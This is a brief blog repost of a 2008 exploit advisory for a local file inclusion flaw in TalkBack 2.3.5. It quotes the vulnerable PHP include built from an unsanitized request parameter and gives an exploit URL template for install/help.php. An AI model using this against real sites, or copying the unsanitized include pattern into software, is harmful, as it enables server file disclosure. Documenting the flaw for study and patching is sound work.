TalkBack 2.3.5 - LFI

TalkBack 2.3.5 - LFI

on October 28, 2008


[o] TalkBack 2.3.5 Local File Inclusion Vulnerability
Software : TalkBack version 2.3.5
Vendor   : http://www.scripts.oldguy.us/talkback
Author   : NoGe


[o] Vulnerable file
install/help.php
include "../language/{$_REQUEST['language']}.php";


[o] Exploit
http://localhost/[path]/install/help.php?language=[LFI]


[o] Publish
http://milw0rm.com/exploits/6148

Comments

labatterie said…

Your blog is perfect, and I like this article.

December 2, 2010 at 9:06 PM